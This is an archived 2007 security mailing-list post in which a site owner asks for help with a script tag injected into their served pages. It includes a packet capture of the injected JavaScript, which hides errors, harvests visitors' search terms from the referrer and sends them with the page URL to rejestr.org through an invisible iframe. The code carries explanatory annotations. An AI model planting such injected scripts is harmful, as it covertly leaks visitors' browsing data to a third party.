Security Basics mailing list archives

been hacked ?


From: "d3l user" <d3luser () gmail com>
Date: Wed, 30 May 2007 13:20:28 +0200

while browsing through a web page hosted on my web server I have seen
in the firefox page source the following line:

<script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script>


Subsequently I opened the file index.php on the server with vim, and there
is no trace of that line. This also happens with static HTML pages.


any idea about ?


Below you can find the tcpdump stream.


thanks in advance,

delUser





GET /mystat/2.js?host=wymiana.org HTTP/1.1

Host: rejestr.org

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3)
Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)

Accept: */*

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.mywebsite.com/



HTTP/1.1 200 OK

Date: Tue, 29 May 2007 19:46:27 GMT

Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8
mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27
OpenSSL/0.9.7a

X-Powered-By: PHP/4.4.2

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



53d

// Installs a window.onerror handler that always returns true, which suppresses
// the browser's default reporting of script errors on the embedding page.
function stopErrors(){return true;}window.onerror=stopErrors;
/**
 * Looks up the query-string parameter named `v` in the URL-like value `r`.
 *
 * @param v - parameter name to look for
 * @param r - value whose string form is searched (the caller passes the referrer)
 * @returns the raw text after '=' for the first matching pair, not URL-decoded;
 *          undefined when no pair matches, because the function falls off the end
 */
function getJS(v,r)
{
// q is not declared in this function, so this assignment writes the outer q.
q = r.toString ();
var p = q.indexOf('?');
// Keep only what follows the first '?'. If there is no '?' (or it is at
// index 0) the whole string is split below.
if (p > 0) {q = q.substring(p+1);}
var vs = q.split("&");
for (var i=0;i<vs.length;i++)
{
var pr = vs[i].split("=");
// Loose equality on the parameter name; the first match wins.
if (pr[0] == v) {return pr[1];}
}
}
// Top-level flow of the captured script: read the referrer, work out which
// search-engine query parameter it would carry, extract the search terms, and
// report them together with the current page URL through a hidden iframe.
// q: name of the query parameter to extract; r: referrer URL.
var q="";
var r="";
// Prefer the top-level frame's referrer, falling back to this document's.
// Any exception raised while reading it is discarded by the empty catch
// (presumably to survive a blocked cross-origin access to top; not confirmed here).
try {
if (top.document.referrer) {r=top.document.referrer;}
else if (document.referrer)  {r=document.referrer;};
}catch (e) {};
if (r !=="")
{
// Substring-match the referrer against search-engine names and record the
// parameter that carries the search terms. These are independent ifs, so a
// later match overwrites an earlier one.
if (r.indexOf("google.") !== -1) {q="q";};
if (r.indexOf("msn.com") !== -1) {q="q";};
if (r.indexOf("altavista.") !== -1) {q="q";};
if (r.indexOf("yahoo.") !== -1) {q="p";};
if (r.indexOf("netsprint.") !== -1) {q="q";};
if (r.indexOf("onet.pl") !== -1) {q="qt";};
// NOTE(review): this pattern starts with a space (" wp.pl"); the page does not
// show whether that is in the served script or an artifact of the archive.
if (r.indexOf(" wp.pl") !== -1) {q="szukaj";};
if (r.indexOf("interia.pl") !== -1) {q="q";};
if (r.indexOf("szukacz.pl") !== -1) {q="q";};
if (r.indexOf("o2.pl") !== -1) {q="qt";};
}
var vars="";
if ((r !=="") && (q!==""))
{
// Extract the search terms from the referrer. getJS also overwrites the
// global q as a side effect of its undeclared assignment.
vars=getJS(q,r);
}
// This compares against the string "undefined", not the undefined value. When
// getJS finds no matching parameter, vars stays undefined, passes the !== ""
// tests below, and the request carries topkey=undefined&src=se.
if (vars=="undefined") {vars="";};
// Tag the value as originating from a search engine.
if (vars!=="") {vars=vars +"&src=se";};
// Both branches write a borderless, zero-size iframe pointing at
// rejestr.org/mystat/2.php. The current page URL (self.location) is sent as id
// and, when present, the search terms as topkey; neither is URL-encoded.
// These requests to rejestr.org are issued by the visitor's browser, so they
// are the traffic to look for when checking whether a page served this script.
// NOTE(review): each string literal below is split across two lines in this
// archived copy, which is not valid JavaScript as shown; presumably the mail
// archive wrapped the lines.
if (vars!==""){
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\";></iframe>")

}else
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=http://rejestr.org/mystat/2.php?id="+self.location+";></iframe>")


0

